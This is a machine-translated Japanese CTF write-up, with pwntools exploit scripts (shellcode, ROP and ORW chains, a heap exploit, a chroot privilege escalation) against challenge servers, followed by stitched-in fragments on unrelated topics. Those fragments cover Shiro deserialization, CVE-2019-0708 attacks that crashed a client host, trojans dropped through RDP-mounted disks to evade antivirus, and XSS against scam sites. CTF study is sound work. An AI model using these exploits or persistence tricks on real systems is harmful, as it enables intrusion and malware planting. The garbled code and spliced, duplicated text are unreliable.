crypto
xor
1.環境を一連の文字として開きます。文字列は、XORスクリプトまたはオンラインデコードツール(1つの暗号化のみ)を使用してデコードできます
キーは模倣です
フラグを復号化します
オンライン復号化
またはスクリプト:#ciphertext ciphertext='0b050c0e180e585f5c52555c55454545c0a0f44535f0f0f5e445658585844055d0f5d0f0f0f555590555555555550914 "=bytes.fromhex(ciphertext)#キーが「キー」であると仮定すると、キー=b'mimic '#xorを変更できます。文字列にバイテを文字strinexextextextext=plantext_bytes.decodes.decodes( 'utf-8')print( 'utf-8')print(plaintext)
pwn
ezcode
JSONのダイレクトシェルコードの復活したjsonのダイレクトシェルコードのセット、長さ0x16を制限します。
PWNインポートから *
JSONをインポートします
コンテキスト(log_level='debug'、os='linux'、arch='amd64')
pwnfile='./vuln'
io=process(pwnfile)
#io=remote()
elf=elf(pwnfile)
libc=elf( '/lib/x86_64-linux-gnu/libc.so.6')
#libc=elf( './libc.so.6')
shellcode='' '
Sal Edi、12
MOV DX、7
MOV AX、10
syscall
CDQ
Xor Eax、Eax
MOV ESI、ECX
Xor EDI、EDI
syscall
'' '
shellcode1=asm(shellcode)
print( 'len-'、len(shellcode1))
payload1={
'shellcode': shellcode1.hex()
}
io.sendlineafter( 'input:'、json.dumps(payload1)を入力してください)
shellcode=asm( '' ''
MOV RDI、0x999800d
Xor ESI、ESI
XOR RDX、RDX
Mov Rax、2
syscall
MOV RDI、Rax
MOV RSI、0x9998000+0x300
MOV EDX、0x40
Xor Eax、Eax
syscall
MOV EDI、1
MOV RSI、0x9998000+0x300
Mov Rax、1
syscall
'' ')
io.sendline(b './flag \ x00 \ x00 \ x00'+シェルコード)
io.Interactive()
signin_revenge
スタックオーバーフロー、パイなし、カナリアなし、rop漏れのある住所を構築してからORW
PWNインポートから *
コンテキスト(log_level='debug'、os='linux'、arch='amd64')
pwnfile='./vuln'
#io=process(pwnfile)
io=remote( 'pwn-16255a8951.challenge.xctf.org.cn'、9999、ssl=true)
elf=elf(pwnfile)
libc=elf( './libc.so.6')
def debug():
gdb.attach(io)
一時停止()
pop_rdi=0x00000000401393
puts_got=elf.got ['puts']
puts_plt=elf.plt ['puts']
main_adr=elf.symbols ['main']
#デバッグ()
pay=b'a '*0x108+flat(pop_rdi、puts_got、puts_plt、main_adr)
io.sendlineafter( '移動してpwn!\ n'、支払い)
puts_adr=u64(io.recvuntil( '\ x7f')[-6:] .ljust(8、b '\ x00'))
libc_base=puts_adr-libc.sym ['puts']
pop_rdx=libc_base +0x00000000142c92
pop_rsi=libc_base +0x00000000002601f
pop_rbp=libc_base +0x0000000000226c0
pop_rax=libc_base +0x0000000000036174
leave_ret=0x4012ee
read=0x04012d6#0x130
BSS=0x404000+0x800
flag_adr=bss+0x98
op=libc_base + libc.symbols ['open']
re=libc_base + libc.symbols ['read']
wr=libc_base + libc.symbols ['write']
pay=b'a '*0x100+p64(bss-8)+flat(pop_rax、bss、read)
io.sendafter( '移動してpwn!\ n'、支払い)
#デバッグ()
orw=flat(pop_rdi、flag_adr、pop_rsi、0、op、
pop_rdi、3、pop_rsi、flag_adr+0x200、pop_rdx、0x100、re、
pop_rdi、1、pop_rsi、flag_adr+0x200、pop_rdx、0x40、wr)+b './flag \ x00'
io.sendline(orw)
io.interactive()
qwen
MEMUポインター、および境界を越えて0x20バイトに書き込むことができます。
次に、バックドアを使用して/proc/self/mapsを読んでメモリ情報を取得し、libc_baseを介して2つのガジェットを取得します
0x000000000000004EE21 : POP RDX; RSP、0x38を追加します。ポップrbx; POP RBP; ret
0x0000000000000D10BE : XOR EAX、EAX; RSPを追加、8; ret
メニューポインターをポップrdxとしてハイジャックします。 RSP、0x38を追加します。ポップrbx; POP RBP; ret、読み取りによって書かれた0x20バイトにジャンプし、システム( "/bin/sh")を実行してシェルを取得します
exp
PWNインポートから *
def debug(c=0):
if(c):
gdb.attach(p、c)
else:
gdb.attach(p)
一時停止()
def get_sb(): return libc_base + libc.sym ['system']、libc_base + next(libc.search(b '/bin/sh \ x00'))
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
S=Lambdaデータ: P.Send(データ)
sa=lambdaテキスト、データ:p.sendafter(テキスト、データ)
SL=Lambdaデータ:p.sendline(data)
sla=lambdaテキスト、データ:p.sendlineafter(テキスト、データ)
r=lambda num=4096 :p.recv(num)
rl=lambdaテキスト:p.recvuntil(テキスト)
pr=lambda num=4096 :print(p.recv(num))
inter=lambda :p.interactive()
l32=lambda :U32(p.recvuntil(b '\ xf7')[-4:] .ljust(4、b '\ x00'))
l64=lambda :U64(p.recvuntil(b '\ x7f')[-6:] .ljust(8、b '\ x00'))
uu32=lambda :u32(p.recv(4).ljust(4、b '\ x00'))
uu64=lambda :u64(p.recv(6).ljust(8、b '\ x00'))
int16=lambdaデータ:INT(データ、16)
LG=Lambda S、num :p.success( '%s -0x%x'%(s、num))
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Context(os='linux'、arch='amd64'、log_level='debug')
p=remote( 'pwn-bc7e9f0275.challenge.xctf.org.cn'、9999、ssl=true)
#p=process( 'pwn1')
elf=elf( 'pwn1')
libc=elf( 'libc.so.6')
#debug( 'b *$ rebase(0x1022)\ n')
範囲のIの場合(5):
sla(b '\ xbc \ x89 \ xef \ xbc \ x9a'、str(i) + '0')
pl=b'a '*0x8 + p16(0x1508)
sa(b'say? '、pl)
sla(b'game [y/n] '、b'n')
sla(b '\ xbc \ x89 \ xef \ xbc \ x9a'、 '111 111')
SLA(b'administrator key \ n '、str(0x6b8b4567))
file_name=b '/proc/self/maps'
sla(b'logged in!\ n '、file_name)
rl(b'デバッグ情報は次のとおりです\ n ')
pro_base=int(r(12)、16)
rl(b'libc.so.6 \ n ')
libc_base=int(r(12)、16)-0x1e7000
lg( 'pro_base'、pro_base)
lg( 'libc_base'、libc_base)
範囲のIの場合(5):
sla(b '\ xbc \ x89 \ xef \ xbc \ x9a'、str(i) + '0')
#0x00000000000004EE21 : POP RDX; RSP、0x38を追加します。ポップrbx; POP RBP; ret
#0x000000000000D10BE : XOR EAX、EAX; RSPを追加、8; ret
rdi=libc_base +0x00000000002164f
システム、binsh=get_sb()
ret=libc_base +0x00000000000000008aa
one_gadget=libc_base +0x00000000000004ee21
PL=P64(LIBC_BASE +0x000000000000D10BE) + P64(ONE_GADGET) + P64(RET) + P64(RDI) + P64(BINSH) + P64(システム)
sa(b'say? '、pl)
sla(b'game [y/n] '、b'n')
sla(b'\xbc\x89\xef\xbc\x9a', '111 1111111111111111111111111111111111111111111111111')
lg( 'pro_base'、pro_base)
lg( 'libc_base'、libc_base)
#一時停止()
inter()、そして電力をエスカレートします。
ターゲットマシンのPWN2は、脱落し、許可を持つ可能性があり、-Xが存在しないファイルを指している場合、-Xを作成して解凍できます。
例えば
/home/pwn2 -x test.tarには、base64が入力され、ローカルに生成されたtarパッケージが必要です
Dockerの質問は通常xinetdを使用してXinetDの構成ファイルを表示するため、/usr/bin/chrootを使用してルートからCTFユーザーに切り替えるため、Chmox 777/home/ctf/flagに変更/usr/bin/chrootを変更してから、別の末端NC、トリガーchrootを使用します。
signin
追加関数には0_O関数があり、Signin_Revengeと同じスタックオーバーフローがあります。これを使用して、直接ヒットすることができます。
PWNインポートから *
ctypesをインポートします
ctypesからインポート *
コンテキスト(arch='amd64'、os='linux'、log_level='debug')
file_name='./vuln'
libc=elf( './libc.so.6')
#libc=ctypes.cdll( '/lib/x86_64-linux-gnu/libc.so.6')
#libc.srand.argtypes=[ctypes.c_uint]
Li=Lambda X : Print( '\ x1b [01; 38; 5; 214m' + str(x) + '\ x1b [0m')
ll=lambda x : print( '\ x1b [01; 38; 5; 1m' + str(x) + '\ x1b [0m')
#context.terminal=['tmux'、 'splitw'、 '-H']
debug=1
debug:の場合
r=remote( 'pwn-c9b9d9e4e9.challenge.xctf.org.cn'、9999、ssl=true)
else:
r=process(file_name)
libcc=cdll.loadlibrary( './libc.so.6')
libcc.srand(libcc.time(0))
elf=elf(file_name)
def dbg():
gdb.attach(r)
一時停止()
def dbgg():
raw_input()
r.send( 'rbp')
範囲(100):のIの場合
a=libcc.rand()%100+1
r.sendafter( '認証コード: \ n'、p64(a)を入力)
r.sendafter( '\ n'、p32(1))
#dbg()
r.sendafter( 'index: \ n'、p32(0))
r.sendafter( 'note: \ n'、b'a '*0x10)
睡眠(0.5)
r.send(b'a '*0x108+p64(0x401893)+p64(0x404028)+p64(0x401110)+p64(0x4013c0)))
libc_base=u64(r.recvuntil( '\ x7f')[-6:] .ljust(8、b '\ x00'))-libc.sym ['puts']]
openn=libc_base+libc.sym ['open']
read=libc_base+libc.sym ['read']
書き込み=libc_base+libc.sym ['write']
rdi=libc_base +0x0000000000023b6a
rsi=libc_base +0x00000000002601f
rdx=libc_base +0x00000000142c92
印刷(hex(libc_base))
r.send(b'a '*0x108+p64(rsi)+p64(0x404180)+p64(read)+p64(0x4013c0))
r.send( 'flag')
睡眠(0.5)
r.send(b'a '*0x100+p64(0x404200)+p64(0x4013cf))
睡眠(0.5)
r.send(b'a '*0x100+p64(0x404300)+p64(0x4013cf))
睡眠(0.5)
#dbg()
R.Send(b'flag \ x00 \ x00 \ x00 \ x00 '+p64(RDI)+P64(0x404200)+P64(RSI)+P64(0)+P64(RDX)+P64(0)+P64(Openn)+P64 (RDI)+P64(3)+P64(RSI)+P64(0x4041A0)+P64(RDX)+P64(0x30)+P64(READ)+P64(RDI)+P64(RDI)+P64(1)+P64(書き込み)))
R.Interactive()
ゲストブック
メニューヒーププログラムにはUAFがあり、アプリケーションサイズの制限は0x4ff以上です。他の制限はありません。その後、ボードとタイプハウスのアップルを置くだけです
PWNインポートから *
sysをインポートします
context.log_level='debug'
context.arch='amd64'
#libc=elf( '/lib/x86_64-linux-gnu/libc.so.6')
libc=elf( './libc.so.6')
フラグ=1
flag3360の場合
p=remote( 'pwn-ca43b7414f.challenge.xctf.org.cn'、9999、ssl=true)
else:
p=process( './pwn')
SA=Lambda S、N : P.Sendafter(S、N)
SLA=Lambda S、N : P.SendlineFter(S、N)
SL=Lambda S : P.Sendline(s)
sd=lambda s : p.send(s)
rc=lambda n : p.recv(n)
ru=lambda s : p.recvuntil(s)
ti=lambda : p.Itteractive()
漏れ=ラムダ名、addr :log.success(name+' - '+hex(addr))
def dbg():
gdb.attach(p)
一時停止()
DEF CMD(選択):
ru( '')
SL(str(選択))
def add(index、size):
CMD(1)
ru( 'index')
SL(str(index))
ru( 'サイズ')
SL(str(size))
def編集(index、content):
CMD(2)
ru( 'index')
SL(str(index))
ru( 'content')
SD(コンテンツ)
def delete(index):
CMD(3)
ru( 'index')
SL(str(index))
def show(index):
CMD(4)
ru( 'index')
SL(str(index))
追加(0,0x520)
追加(1,0x500)
追加(2,0x510)
削除(0)
追加(3,0x568)
削除(2)
show(0)
mainarean=u64(ru(b '\ x7f')[-6:] .ljust(8、b '\ x00'))
libc_base=mainarean-0x21b110
編集(0、b'a '*0x10)
show(0)
ru(b'a '*0x10)
heap_base=u64(p.recv(6).ljust(8、b '\ x00'))-0x290
編集(0、P64(メイレアン)*2)
free_hook=libc_base+libc.sym ['__ free_hook']
ogs=[0xe3afe、0xe3b01,0xe3b04]
og=libc_base+ogs [1]
puts_io_all=libc_base + libc.sym ['_ io_list_all']
wfile=libc_base + libc.sym ['_ io_wfile_jumps']
addr=libc.symbols ['puts']+libc_base
fake_io_addr=heap_base +0x1720
lock=0x3ed8b0+libc_base
pop_rdi=libc_base + next(libc.search(asm( 'pop rdi; ret;'))))))
pop_rsi=libc_base + next(libc.search(asm( 'pop rsi; ret;')))))
pop_rdx_r12=libc_base + next(libc.search(asm( 'pop rdx; pop R12)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
Rememberme=Deletemeフィールドを見ると、Shiro Deserializationの脆弱性
44444444があると言えます。
。
上記のコマンドを完了したら、1を入力してmsfvenomを選択します
はあきらめたくなかったので、定着は役に立たなかった。 20回以上攻撃した後、同じ間違いがまだ同じであり、顧客のターゲットマシンを引き起こし、ブルースクリーンを20回以上追跡しました。
CVE-2019-0708を使用して、ホストを再起動するように「強制」します。あなたはそれが正常に起動されたことを見ることができます。
実際のテスト後、このスタートアップアイテムは国内のソフトウェアキラーを通過できますが、CMDを呼び出すと傍受されます。
:吊り下げディスクの使用に基づいてファイルをコピーすることはそれほど多くありません。ファイルをドラッグするか、異なる吊り下げディスクに従ってスタートアップアイテムをドロップするかどうかを決定できます。 https://github.com/cnucky/darkguardiandarkguardianなど、ファイルを自動的に監視およびコピーするアプリケーションがいくつかあります。RDPログイン後のTSClient(ハングディスク)を監視するために使用されるツールです。ツールがバックグラウンドで実行されている場合、ハンギングディスク上のファイルのリストを自動的に取得し、指定されたファイルをダウンロードし、マウントされたハードディスクのスタートアップアイテムにトロイの木馬ファイルをコピーできます。
:吊り下げディスクの使用に基づいてファイルをコピーすることはそれほど多くありません。ファイルをドラッグするか、異なる吊り下げディスクに従ってスタートアップアイテムをドロップするかどうかを決定できます。 https://github.com/cnucky/darkguardiandarkguardianなど、ファイルを自動的に監視およびコピーするアプリケーションがいくつかあります。RDPログイン後のTSClient(ハングディスク)を監視するために使用されるツールです。ツールがバックグラウンドで実行されている場合、ハンギングディスク上のファイルのリストを自動的に取得し、指定されたファイルをダウンロードし、マウントされたハードディスクのスタートアップアイテムにトロイの木馬ファイルをコピーできます。
cp /usr/share/exploitdb/exploits/php/webapps/40974.py/opt
にアクセスしてください
しかし、幸いなことに、証拠収集ツールがあります。あなたはそれを回復せずにそれをすることができます。ファイルシステムを慎重に検索しなかったため、以下は私が見つけた別の方法です。
文字列があります。来て、見てください
にパスワードが与えられました。 MySQLにログインして、正常にログインしてください。
Select * Secretから。
コンテキストによると、その数は15555215556であることを知ることができます。これはペギーの同僚であるはずです。ペギーがフィッシング情報を受け取ったかどうかを尋ねてください。
CEを使用して、java.exeプロセスには「R3CTF」、「R3CTF」、「フラグ」が多いことを確認します。村人の名前は記憶の中で単純なテキストに保存されていると推測されています。写真を実行した後、
p.s.テスト後、旅行マップ(Journeymap-1.19.2-5.9.8-fabric)をロードした後にのみ、村人の名前を記憶に載せることができます。旅行地図にいくつかのクリーチャーNBTを記録することは合理的です。
2。 Webpack-dev-serverをグローバルにインストールします
:010101。プロジェクトソースコードをダウンロード:3https://github.com/backlion/qqgroup-visualization2。 Project Directory 
3を入力します。 db.jsonファイルを開き、データベース接続情報を独自のデータベース接続情報に変更します(デフォルトのデータベース接続情報は自分のサーバーのデータベースであり、利用可能になることは保証されていません)db.jsonの例:{{{
2を入力します。インストール依存関係
3。ランニングシステム
注:sqlserverのバージョン以降のsqlserver2008r2を使用してください
2を引用します。 Xを選択します----バックエンドは、都市とBaiduからの写真のすべての厄介な紹介です。偽物3。バックエンドデータを投稿しています
デモサイトの指紋およびデフォルトアカウントパスワードを介して、同じタイプのサイトのバッチを見つけました。基本的に、私はカラーレイジービデオを使用して、ほうれん草を誘導しました。
背景宝くじプリセット、すべての詐欺。この記事をあなたの色の怠zyな友達と共有したいと思っています。
初期段階では、デモサイトの指紋を見つけるためのソースコードを見つける方法を見つけました。一部のサイトもありますが、これは通常の浸透方法です。まず、アカウントを登録し、ユーザー名をカスタマイズしてXSコードに直接配置できるプロンプトを確認します。それはお金の無駄であり、背景を引き起こすのは困難です。背景をトリガーするのは困難です。
バックグラウンドでのユーザーディスプレイはこのようなものであり、ユーザーの詳細をクリックすると
もトリガーされます。
